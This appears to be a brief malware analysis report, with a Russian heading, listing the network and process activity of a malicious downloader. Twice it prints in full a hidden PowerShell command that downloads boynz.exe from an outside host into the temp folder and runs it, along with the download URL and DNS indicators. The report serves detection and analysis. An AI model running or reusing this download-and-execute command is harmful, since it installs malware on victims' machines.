Техническая информация
- http://hoppec.com/eme01/boynz.exe как %temp%\\boynz.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://hoppec.com/eme01/boynz.exe','%TEMP%\\boynz.exe') & %TEMP%\\boynz.exe
- %TEMP%\boynz.exe
- 'ho##ec.com':80
- http://ho##ec.com/eme01/boynz.exe
- DNS ASK ho##ec.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://hoppec.com/eme01/boynz.exe','%TEMP%\\boynz.exe') & %TEMP%\\boynz.exe' (со скрытым окном)